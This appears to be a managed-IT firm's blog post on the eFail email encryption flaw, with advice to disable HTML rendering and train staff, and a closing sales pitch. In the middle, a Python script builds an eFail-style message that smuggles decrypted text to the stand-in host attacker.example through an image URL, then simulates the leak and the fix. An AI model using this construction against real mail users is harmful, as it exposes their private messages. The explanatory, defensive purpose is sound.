Email or eFail? Is Email Encryption Safe?

Email encryption is currently a controversial topic in the cybersecurity world. If you read Wired or the Washington Post, you might believe the sky is falling and that you should stop using email encryption right now, because otherwise advanced attackers will exploit weaknesses in widely used encryption programs to steal your data. With that much noise, it can be difficult to determine whether encrypted email is still safe to use.

What Is Email Encryption?

Email encryption is designed not so much to prevent the interception of messages as to render an intercepted message useless to anyone who does not hold the proper key. Unfortunately, researchers have shown that an attacker who has already captured an encrypted email can modify it so that, when the recipient's mail client decrypts the message and renders it as HTML, the decrypted plain text is sent back to the attacker, for example as part of an image URL that the client loads automatically. This attack, published in 2018 under the name eFail, targets the way mail clients handle OpenPGP and S/MIME messages rather than the underlying encryption algorithms, and it can leave the contents of encrypted emails exposed.

Email encryption has flaws, but it’s not your biggest security threat.

IT experts have been warning for years that there are inherent weaknesses in the OpenPGP and S/MIME ecosystems. But a bigger risk than eFail is employees who lack basic cybersecurity skills and still click on unknown links or open unsafe attachments. Yes, eFail is something to be aware of. But, as with any news these days, one must read past the headlines and hype to determine the actual facts, and in this case most organizations would be better off keeping their encryption in place and training their employees to recognize phishing attacks and ransomware.

What is the best course of action?

eFail is certainly something to be aware of, and some mail clients and PGP/S/MIME plugins that handle decrypted content unsafely need to be patched or reconfigured. Rather than eliminating email encryption, most organizations can nip the threat by disabling HTML rendering (or at least the automatic loading of remote content such as images) in their email clients, as recommended by Hackaday. Hackaday has one of the easiest-to-comprehend breakdowns of eFail and why it is not really the “PGPocalypse” the media would have had us believe it was.
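To make the attack described above and the recommended mitigation concrete, here is an added example (not code from the original article, and not the eFail researchers' own tooling) that models the direct-exfiltration variant of eFail in Python. Everything in it is constructed: the attacker host attacker.example, the sample message, and the "captured" ciphertext are assumptions, and real OpenPGP decryption is replaced by a lookup stand-in (decrypt_stub) so the script runs offline. It builds the attacker's three-part message, then simulates the victim's client twice: once with HTML rendering on, where the decrypted text ends up inside an image URL the client would fetch, and once with it off, where nothing is fetched.

```python
"""Model of eFail's direct-exfiltration channel and the HTML-rendering mitigation.

Added example, not from the original article. Real OpenPGP decryption is
replaced by a lookup stand-in (decrypt_stub) so the script runs offline, and
attacker.example and all message contents are constructed sample data.
"""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from html.parser import HTMLParser

# Constructed sample: plaintext of a message the victim once received encrypted.
SECRET_PLAINTEXT = "Wire transfer approved: account 12345, amount 50000 EUR"

# Constructed opaque blob standing in for the captured PGP ciphertext.
CAPTURED_CIPHERTEXT = (
    "-----BEGIN PGP MESSAGE-----\n"
    "hQEMA0c0n5TrUcT3dAQf\n"
    "-----END PGP MESSAGE-----"
)


def decrypt_stub(blob):
    """Stand-in for the victim's PGP plugin: only the captured blob decrypts."""
    if blob.strip() == CAPTURED_CIPHERTEXT:
        return SECRET_PLAINTEXT
    raise ValueError("unknown ciphertext")


def build_efail_message(attacker_host):
    """Attacker side: wrap the replayed ciphertext between two HTML parts so the
    decrypted text lands inside an <img src="..."> attribute."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "Re: Invoice"
    msg.make_mixed()

    prefix = EmailMessage()
    prefix.set_content(f'<img src="http://{attacker_host}/', subtype="html")
    cipher = EmailMessage()
    cipher.set_content(CAPTURED_CIPHERTEXT)          # text/plain, replayed as-is
    suffix = EmailMessage()
    suffix.set_content('">', subtype="html")          # closes the attribute

    for part in (prefix, cipher, suffix):
        msg.attach(part)
    return msg.as_bytes()


class _ImgSrcCollector(HTMLParser):
    """Records every <img src> an HTML renderer would fetch."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.urls.append(value)


def victim_client_view(raw_message, decrypt, html_enabled):
    """Victim side: decrypt PGP parts in place and build one view of all parts.

    Vulnerable clients concatenated the parts into a single HTML document and
    did not escape the decrypted text, so the suffix part closes the <img> tag
    opened by the prefix. Returns the combined document and the URLs an
    HTML-rendering client would request.
    """
    msg = BytesParser(policy=policy.default).parsebytes(raw_message)
    bodies = []
    for part in msg.iter_parts():
        body = part.get_content()
        if "BEGIN PGP MESSAGE" in body:
            body = decrypt(body)   # plaintext inserted verbatim (the eFail flaw)
        bodies.append(body)
    document = "".join(bodies)

    if not html_enabled:
        # Plain-text display: the tag fragments are visible text, nothing is fetched.
        return {"document": document, "fetched_urls": []}

    collector = _ImgSrcCollector()
    collector.feed(document)
    collector.close()
    return {"document": document, "fetched_urls": collector.urls}


def plaintext_leaks(raw_message, html_enabled):
    """True if any URL the client would fetch carries the decrypted secret."""
    view = victim_client_view(raw_message, decrypt_stub, html_enabled)
    return any(SECRET_PLAINTEXT in url for url in view["fetched_urls"])


if __name__ == "__main__":
    raw = build_efail_message("attacker.example")
    print("HTML rendering on, plaintext leaks:", plaintext_leaks(raw, True))
    print("HTML rendering off, plaintext leaks:", plaintext_leaks(raw, False))
```

With HTML rendering on, the simulated client would request http://attacker.example/ followed by the decrypted text, which is exactly the request an attacker's web server logs in the real attack. With HTML rendering off, the same message displays the tag fragments as harmless text and no request is made. Patched clients close the channel by not loading remote content and by not rendering decrypted parts in the same document as attacker-controlled HTML, which is why the advice is to fix the client configuration rather than abandon encryption.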

Blanket elimination of email encryption tools will leave organizations open to other attacks, and in this case it is overkill. Instead, work with your managed IT team to make sure your PGP setup is correctly configured and up to date, and have them conduct a risk assessment. But if you really want to ensure email security, focus on training employees. They are your front-line defense against the attacks most likely to steal your data.

At thinkCSC, we believe that in order to achieve maximum success, regardless of the size or type of your organization, you must make IT an integral part of your overall business strategy and partner with IT professionals who not only understand how to leverage technology to your advantage but who are also committed to understanding your business goals and aligning your IT strategy to them. We pride ourselves on having the best business-savvy technical experts in the industry. If you would like to learn how to create an IT security strategy aligned with your organizational goals, contact thinkCSC for more information.